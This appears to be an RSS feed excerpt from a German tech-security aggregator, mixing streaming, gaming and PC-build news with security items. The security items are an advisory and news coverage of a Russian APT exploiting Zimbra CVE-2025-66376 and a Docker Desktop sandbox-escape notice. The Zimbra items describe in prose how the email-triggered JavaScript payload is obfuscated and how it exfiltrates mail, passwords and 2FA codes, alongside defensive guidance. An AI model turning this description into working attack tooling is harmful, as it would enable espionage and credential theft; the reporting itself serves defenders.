<link>https://tsecurity.de/de/3690878/it-nachrichten/formel-1-rennen-in-ungarn-per-tv-oder-stream-gratis-live-sehen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690878/it-nachrichten/formel-1-rennen-in-ungarn-per-tv-oder-stream-gratis-live-sehen/</guid>
<pubDate>Fri, 24 Jul 2026 09:03:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Formel 1 kommt nach Ungarn. Sky, ORF und SRF übertragen das Event, RTL ist teilweise dabei. Wir verraten, wo Sie alle Grand-Prix-Sessions und das Rennen per TV oder Stream live schauen – auch kostenlos.]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian-Linked Hackers Target Zimbra Users With Zero-Day Exploit]]></title>
<description><![CDATA[A Zimbra phishing campaign attributed to Russian state-supported cyber actors has targeted Western government and commercial organizations, exploiting CVE-2025-66376 to access sensitive email data and other information, according to a joint cybersecurity advisory issued in July 2026.

The activ...]]></description>
<link>https://tsecurity.de/de/3690812/it-security-nachrichten/russian-linked-hackers-target-zimbra-users-with-zero-day-exploit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690812/it-security-nachrichten/russian-linked-hackers-target-zimbra-users-with-zero-day-exploit/</guid>
<pubDate>Fri, 24 Jul 2026 08:25:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Zimbra-phishing-campaign.gif" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Zimbra phishing campaign" decoding="async" title="Russian-Linked Hackers Target Zimbra Users With Zero-Day Exploit 1"></p>A Zimbra phishing campaign attributed to Russian state-supported cyber actors has targeted Western government and commercial organizations, exploiting CVE-2025-66376 to access sensitive email data and other information, according to a joint cybersecurity advisory issued in July 2026.

The activity has been linked primarily to LAUNDRY BEAR, a Russian state-supported advanced persistent threat (APT) group tracked under several names across the cybersecurity industry. The advisory said the campaign has been active since at least July 2025 and has targeted organizations using the Zimbra Collaboration Suite (ZCS).

Unlike conventional phishing attacks that typically require victims to click a malicious link or open an attachment, the campaign uses a view-based <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29111">exploit</a>. A user only needs to view a malicious email in a vulnerable version of ZCS webmail for the exploit to attempt execution.
<h3><strong>Zimbra Phishing Campaign Uses CVE-2025-66376</strong></h3>
The campaign centers on CVE-2025-66376, a vulnerability that was initially exploited as a <a href="https://thecyberexpress.com/zero-day-vulnerability-microsoft-sharepoint/" target="_blank" rel="noopener">zero-day vulnerability </a>before a patch was released. According to the <a href="https://www.ic3.gov/CSA/2026/260723.pdf" target="_blank" rel="nofollow noopener">advisory</a>, the activity began in July 2025, months before the vulnerability was published and patched.

The <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29110">vulnerability</a> allows a JavaScript payload contained in email content to execute because of improper sanitization of CSS @import directives within an email. The malicious payload uses Base64 encoding and XOR encryption and can be modified to help bypass basic threat detection signatures.

Once triggered, the payload attempts to collect and exfiltrate information through 12 stages. These include gathering the victim's email address and environment information, collecting two-factor authentication codes and application passwords, attempting to capture saved passwords, enabling mail protocols, gathering the Global Address List (GAL), and sending archived email <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29112">data</a>.

The advisory said the campaign's use of a zero-day exploit demonstrates the ability of LAUNDRY BEAR to operationalize novel <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29108">vulnerabilities</a> into a successful attack capability.
<h3><strong>LAUNDRY BEAR Targets Email and Sensitive Data</strong></h3>
The primary objective of the Russian state-supported <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29109">cyber</a> actors appears to be the covert acquisition of email data. The campaign attempts to steal the last 90 days of email communications, email addresses, passwords, the organization's Global Address List, 2FA tokens and newly created application passcodes.

The actors have targeted organizations connected to the defense industrial base, government, education, energy, law enforcement, media, non-governmental organizations and technology sectors.

The advisory said LAUNDRY BEAR likely identifies organizations with publicly exposed Zimbra infrastructure through port scanning and commercially available datasets. It may then compile individual user email addresses using commercial data, open-source intelligence or previously exfiltrated information.

The group has also used compromised accounts to distribute <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noopener" title="phishing" data-wpil-keyword-link="linked" data-wpil-monitor-id="29114">phishing</a> emails. Since at least November 2025, malicious emails were reportedly sent from victim infrastructure, potentially using previously compromised accounts to make the activity harder to detect and to bypass anti-phishing measures.
<h3><strong>Ulej and Flowerbed Support Email Data Exfiltration</strong></h3>
The campaign uses a custom capability called Ulej, which was developed to exploit ZCS and exfiltrate sensitive information. The collected data is sent to infrastructure associated with the Flowerbed framework.

Flowerbed is a Python project using Docker and includes four containers: Catcher, Certbot, Nginx and Gardener. Catcher receives and aggregates stolen information, while Nginx operates as an HTTPS reverse proxy. The framework uses DNS and HTTPS channels for <a href="https://thecyberexpress.com/ai-driven-phishing-campaign/" target="_blank" rel="noopener">email data exfiltration</a>.

The advisory said the campaign can exfiltrate email content, contacts, attachments, authentication information and other data. The stolen information is initially stored by Catcher before being transferred to non-public-facing infrastructure.

The report also noted indications that artificial intelligence may have played a role in developing the Flowerbed codebase, highlighting the increasing use of AI in developing malicious capabilities.
<h3><strong>Organizations Urged to Patch Vulnerable Zimbra Systems</strong></h3>
The advisory urged organizations using ZCS to immediately ensure their systems are not running vulnerable versions. A patch for CVE-2025-66376 was released for ZCS versions 10.1.13 and 10.0.18.

If immediate patching is not possible, organizations are advised to have employees use alternative mail clients and avoid the Classic ZCS webmail client until the software is updated.

<a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29107">Security</a> teams are also advised to monitor internet-connected ZCS systems, workstations accessing those systems and network traffic for signs of suspicious activity. Recommended monitoring includes looking for large outbound data transfers to unfamiliar VPS providers, unusual DNS queries with random subdomains, sudden connections to newly established domains and connections involving <a class="wpil_keyword_link" href="https://thecyberexpress.com/how-to-get-a-vpn/" title="VPN" data-wpil-keyword-link="linked" data-wpil-monitor-id="29113">VPN</a> providers such as Mullvad.

Organizations should also consider authentication services that support passkeys and maintain network monitoring, packet capture or NetFlow data and relevant logs.

The advisory further recommends that organizations identifying victims revoke Application Passcodes and 2FA scratch keys and require affected employees to change their passwords. Security teams should also investigate the original phishing email and quarantine similar messages to prevent further exploitation and data theft.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wird Klopp neuer Bundestrainer? So seht ihr die DFB-Pressekonferenz gratis im Live-Stream]]></title>
<description><![CDATA[Der DFB hat kurzfristig zu einer Pressekonferenz am Freitagmorgen geladen - vermutet wird die Vorstellung von Jürgen Klopp als Bundestrainer. So seht ihr den Live-Stream kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	ZDF,												...]]></description>
<link>https://tsecurity.de/de/3690777/it-nachrichten/wird-klopp-neuer-bundestrainer-so-seht-ihr-die-dfb-pressekonferenz-gratis-im-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690777/it-nachrichten/wird-klopp-neuer-bundestrainer-so-seht-ihr-die-dfb-pressekonferenz-gratis-im-live-stream/</guid>
<pubDate>Fri, 24 Jul 2026 07:47:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der DFB hat kurzfristig zu einer Pressekonferenz am Freitagmorgen geladen - vermutet wird die Vorstellung von Jürgen Klopp als Bundestrainer. So seht ihr den Live-Stream kostenlos im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[ZDI-26-451: Docker Desktop for macOS Inference Server Permissive Allow List Sandbox Escape Vulnerability]]></title>
<description><![CDATA[This vulnerability allows local attackers to escape the model runner sandbox on affected installations of Docker Desktop for macOS. An attacker must first obtain the ability to execute low-privileged code within the sandbox in order to exploit this vulnerability. The ZDI has assigned a CVSS ratin...]]></description>
<link>https://tsecurity.de/de/3690363/sicherheitsluecken/zdi-26-451-docker-desktop-for-macos-inference-server-permissive-allow-list-sandbox-escape-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690363/sicherheitsluecken/zdi-26-451-docker-desktop-for-macos-inference-server-permissive-allow-list-sandbox-escape-vulnerability/</guid>
<pubDate>Fri, 24 Jul 2026 00:31:55 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This vulnerability allows local attackers to escape the model runner sandbox on affected installations of Docker Desktop for macOS. An attacker must first obtain the ability to execute low-privileged code within the sandbox in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8.]]></content:encoded>
</item>
<item>
<title><![CDATA[Telekom streamt Wacken 2026: Live und kostenlos auf MagentaTV]]></title>
<description><![CDATA[Im Jahr 1990 startete Wacken Open Air mit gerade mal sechs Bands auf einem Acker in Schleswig-Holstein begann. Mittlerweile ist das das größte Heavy-Metal-Festival der Welt. Auch in diesem Jahr ist das Festival wieder ausverkauft. Solltet ihr keine Karte haben und vor Ort sein, so könnt ihr eure ...]]></description>
<link>https://tsecurity.de/de/3690132/ios-mac-os/telekom-streamt-wacken-2026-live-und-kostenlos-auf-magentatv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690132/ios-mac-os/telekom-streamt-wacken-2026-live-und-kostenlos-auf-magentatv/</guid>
<pubDate>Thu, 23 Jul 2026 22:03:18 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Im Jahr 1990 startete Wacken Open Air mit gerade mal sechs Bands auf einem Acker in Schleswig-Holstein begann. Mittlerweile ist das das größte Heavy-Metal-Festival der Welt. Auch in diesem Jahr ist das Festival wieder ausverkauft. Solltet ihr keine Karte haben und vor Ort sein, so könnt ihr eure Lieblingsbands kostenlos und Live-Stream auf MagentaTV verfolgen. […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Keine Lust mehr auf Windows? So funktioniert der Umstieg - oft kostenlos]]></title>
<description><![CDATA[Linux zu nutzen ist heute ziemlich simpel – wenn man ein paar Dinge vorher weiß. Wir erklären, wie der Umstieg möglichst reibungslos abläuft. Von der kompatibleweiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3690118/it-nachrichten/keine-lust-mehr-auf-windows-so-funktioniert-der-umstieg-oft-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690118/it-nachrichten/keine-lust-mehr-auf-windows-so-funktioniert-der-umstieg-oft-kostenlos/</guid>
<pubDate>Thu, 23 Jul 2026 21:52:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Linux zu nutzen ist heute ziemlich simpel – wenn man ein paar Dinge vorher weiß. Wir erklären, wie der Umstieg möglichst reibungslos abläuft. Von der kompatible<a href="https://t3n.de/news/windows-linux-umstieg-kostenlos-1741537/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Insider-Test: Xbox-Online-Gaming kostenlos, wenn man Werbung schaut]]></title>
<description><![CDATA[Microsoft bietet Mitgliedern des Xbox-Insider-Programms ab sofort die Möglichkeit, bestimmte Spiele aus ihrem Besitz auch ohne den Abschluss eines Game-Pass-Abonnements online zu nutzen. Voraussetzung ist, dass sich die Nutzer zuvor Werbung ansehen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3689972/it-security-nachrichten/insider-test-xbox-online-gaming-kostenlos-wenn-man-werbung-schaut/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689972/it-security-nachrichten/insider-test-xbox-online-gaming-kostenlos-wenn-man-werbung-schaut/</guid>
<pubDate>Thu, 23 Jul 2026 20:29:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160169.html"><img hspace="5" border="0" align="left" alt="Microsoft, Konsole, Spielkonsole, Xbox, Xbox Series X, Spielekonsolen, Controller, Xbox Series S, Core, Elite, Series, Xbox Series Elite Controller 2" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/58876.png"></a>
			Microsoft bietet Mitgliedern des Xbox-Insider-Programms ab sofort die Möglichkeit, bestimmte Spiele aus ihrem Besitz auch ohne den Abschluss eines Game-Pass-Abonnements online zu nutzen. Voraussetzung ist, dass sich die Nutzer zuvor Werbung ansehen.			(<a href="https://winfuture.de/news,160169.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Epic Games Store: Narrative-Kartenspiel „Foretales“ gratis abstauben]]></title>
<description><![CDATA[Donnerstag ist Gratis-Spiel-Zeit im Epic Games Store. Ab sofort könnt ihr euch dort das storygetriebene Kartenspiel Foretales kostenlos für den PC sichern und eurer Bibliothek hinzufügen....Zum Beitrag: Epic Games Store: Narrative-Kartenspiel „Foretales“ gratis abstauben

Wo du uns folgen kannst:...]]></description>
<link>https://tsecurity.de/de/3689642/it-nachrichten/epic-games-store-narrative-kartenspiel-foretales-gratis-abstauben/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689642/it-nachrichten/epic-games-store-narrative-kartenspiel-foretales-gratis-abstauben/</guid>
<pubDate>Thu, 23 Jul 2026 18:05:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Donnerstag ist Gratis-Spiel-Zeit im Epic Games Store. Ab sofort könnt ihr euch dort das storygetriebene Kartenspiel Foretales kostenlos für den PC sichern und eurer Bibliothek hinzufügen....<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/epic-games-store-narrative-kartenspiel-foretales-gratis-abstauben/">Epic Games Store: Narrative-Kartenspiel „Foretales“ gratis abstauben</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei RTX 5090 für die HMX 6 und Zeitreise zur Höllenmaschine 4 mit vier GPUs]]></title>
<description><![CDATA[Hallo, ich bin der Michi, willkommen zur vierten Ausgabe des HMX-6-Newsletters. Diese Woche erfahrt ihr, welche Grafikkarten wir in der HMX 6 verbauen. Außerdem verraten wir, warum Halo das Design der HMX 6 prägen wird. Außerdem reisen wir zurück ins Jahr 2012 zur Höllenmaschine 4, die mit vier G...]]></description>
<link>https://tsecurity.de/de/3689498/it-nachrichten/zwei-rtx-5090-fuer-die-hmx-6-und-zeitreise-zur-hoellenmaschine-4-mit-vier-gpus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689498/it-nachrichten/zwei-rtx-5090-fuer-die-hmx-6-und-zeitreise-zur-hoellenmaschine-4-mit-vier-gpus/</guid>
<pubDate>Thu, 23 Jul 2026 17:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hallo, ich bin der Michi, willkommen zur vierten Ausgabe des HMX-6-Newsletters. Diese Woche erfahrt ihr, welche Grafikkarten wir in der HMX 6 verbauen. Außerdem verraten wir, warum Halo das Design der HMX 6 prägen wird. Außerdem reisen wir zurück ins Jahr 2012 zur Höllenmaschine 4, die mit vier Grafikprozessoren neue Maßstäbe beim Gaming setzte. Wenn ihr keine Ausgabe verpassen wollt, könnt ihr den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">Newsletter kostenlos abonnieren</a> – aber vergesst nicht, die Anmeldung via E-Mail zu bestätigen. Viel Spaß beim Lesen!</p>



<p>Hier geht es direkt <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">zum Gewinnspiel der HMX 6 im Gesamtwert von 40.000 Euro</a>. </p>



<h2 class="wp-block-heading toc">HMX 6: 2x RTX 5090 von ZOTAC GAMING und Halo-Design</h2>



<p>Jetzt können wir endlich verraten, welche Grafikkarten in der HMX 6 stecken: Als primäre Gaming-Grafikkarte der HMX 6 ist die RTX 5090 AMP Extreme INFINITY gedacht, während wir parallel dazu die RTX 5090 ARCTICSTORM AIO für <a href="https://store.steampowered.com/app/993090/Lossless_Scaling/" target="_blank" rel="noreferrer noopener">verlustfreie Skalierung</a> verwenden, um Bildqualität und -wiederholrate in praktisch jedem Videospiel zu verbessern. Natürlich könnt ihr die gebündelte Kraft der zwei 5090 auch im kreativen Einsatz nutzen, etwa beim 3D-Rendering oder KI-Berechnungen. Hier findet ihr alle Informationen zu den <a href="https://www.pcwelt.de/article/3193773/hoellenmaschine-hmx-6-mit-zwei-rtx-5090-von-zotac-gaming.html" target="_blank" rel="noreferrer noopener">zwei ZOTAC-Grafikkarten</a>. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c25ef"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ZOTAC-600.jpg?quality=50&amp;strip=all" alt="ZOTAC 600" class="wp-image-3196875" width="600" height="577" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">ZOTAC</p></div>



<p>Eigentlich wollten Kris und ich euch diese Woche schon den aktuellen Stand des Casecon im <a href="https://www.pcwelt.de/article/3194747/hoellenmaschine-hmx-6-im-halo-campaign-evolved-design.html" target="_blank" rel="noreferrer noopener">Halo-Design</a> zeigen. Doch unserem Modder <a href="https://dcmm.de/media/uploads/2023/04/SIEGER_POKAL_012.jpg" target="_blank" rel="noreferrer noopener">Stefan Ulrich</a> fehlen noch diverse Materialien. Jetzt fahren wir wahrscheinlich nächste Woche, doch die Zeit drängt schon wieder, denn wir wollen ja auf die Gamescom mit der HMX 6.</p>



<h2 class="wp-block-heading toc">Rückblick: Die Höllenmaschine 4 setzte technische und optische Maßstäbe</h2>



<p>Neue Maßstäbe setzten wir 2012 auch bei der Vermarktung der Höllenmaschine 4 – zumindest für unsere Verhältnisse: vier aufwendig produzierte <a href="https://www.youtube.com/watch?v=uY7XIARRvZw&amp;t=1s">Teaser-Videos</a> mit Engelchen und Teufelsdamen sowie Fritz als Padawan von Obi-Wan Michi. Das hat riesigen Spaß gemacht und uns als Team Hölle zusammengeschweißt – und war der Beginn einer wunderbaren Freundschaft. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c2e99"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HM4-600.jpg?quality=50&amp;strip=all" alt="HM4 600" class="wp-image-3196869" width="600" height="563" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<p>Technisch auf der Höhe der Zeit waren wir mit den beiden Grafikkarten ASUS GTX690-4GD5, die jeweils zwei 915 MHz schnelle Nvidia Geforce GTX 690 beherbergten. Vier Grafikprozessoren gleichzeitig waren damals absoluter Wahnsinn und sorgten regelmäßig für offene Münder. Dazu gab es den Sechskerner Intel Core i7-3960X, 64 GB RAM im Vierkanalmodus, mit der OCZ RevoDrive die erste PCIe-SSD in einer Höllenmaschine und mit 10 Terabyte natürlich auch wieder verrückt viel HDD-Speicherplatz.</p>



<p>Sein höllisch gutes Aussehen verdankt das Gehäuse den international bekannten Casemoddern <a href="https://www.babetech.de/index.php/ueber-uns">Martin und Stefan Blass</a>. Sie haben ins Cooler Master Cosmos II ein Sichtfenster gefräst und per Airbrush lodernde Flammen auf die beiden Flügeltüren gezaubert. ARGB war damals noch kein Thema, aber mit dem Multidimmer von Richter waren immerhin individuelle Farbtöne und -wechsel per IR-Fernbedienung möglich. Hier geht es zum liebevoll restaurierten <a href="https://www.pcwelt.de/article/3188806/vor-14-jahren-pc-welt-verlost-hoellenmaschine-4-fuer-13333-euro.html" target="_blank" rel="noreferrer noopener">Artikel zur Höllenmaschine 4 aus 2012</a>.</p>



<h2 class="wp-block-heading toc">Maus mit Noctua-Lüfter und Steam Machine im Praxis-Test </h2>



<p>Diese Woche ist eine skurrile Mail in meinem Postfach gelandet: Pulsar und Noctua präsentieren stolz die Früchte ihrer Zusammenarbeit: die <a href="https://www.noctua.at/en/news/pulsar-and-noctua-release-feinmann-f01-noctua-edition-gaming-mouse">Feinmann F01 Noctua Edition</a>, eine Gaming-Maus mit aktiver Belüftung der Handflächen. Ich bin gespannt, wer sich über kühlere Handflächen beim Zocken freut.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a6233f4c38f4"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Feinmann-F01-Noctua-Edition.jpg?quality=50&amp;strip=all" alt="Feinmann F01 Noctua Edition" class="wp-image-3196763" width="600" height="600" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Noctua/Pulsar</p></div>



<p>Mein Kollege und Namensvetter Michael Crider hat sich die kostspielige (<a href="https://www.pcwelt.de/article/3172820/steam-machine-valves-konsole-kostet-ab-1039-euro.html">ab 1.039 Euro</a>) Steam Machine gekauft und einem <a href="https://www.pcwelt.de/article/3194800/steam-machine-im-praxistest-ganz-nett-aber-leider-enttaeuschend.html" target="_blank" rel="noreferrer noopener">ausführlichen Praxistest</a> unterzogen. Sein Fazit fällt allerdings ernüchternd aus: Ein günstiger Mini-PC mit selbst installiertem SteamOS bietet derzeit nahezu denselben Nutzen für deutlich weniger Geld.</p>



<p>Warum es ein Problem ist, dass <a href="https://www.pcwelt.de/article/3193615/in-neuen-laptops-kommen-alte-cpus-zum-einsatz-das-ist-ein-problem.html" target="_blank" rel="noreferrer noopener">in neuen Laptops alte CPUs zum Einsatz kommen</a>, erklärt mein Kollege Mark Hachman.  </p>



<h2 class="wp-block-heading toc">Vielen Dank fürs Lesen!</h2>



<p>ommende Woche besuchen Kris und ich endlich unseren Modder Stefan, der uns dann hoffentlich schon das fast fertige Tisch-PC-Gehäuse für die Build-Week präsentiert – immer optimistisch bleiben, denn langsam drängt die Zeit. Außerdem reisen wir zurück ins Jahr 2013 zur legendären Höllenmaschine 5 mit den vielen Totenköpfen. Wenn ihr nichts verpassen wollt, abonniert den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">kostenlosen HMX-6-Newsletter</a> – und denkt daran, eure Anmeldung per E-Mail zu bestätigen. Ich freue mich schon auf nächste Woche – bis dann! Euer Michi.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Thu, 23 Jul 2026 16:59:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
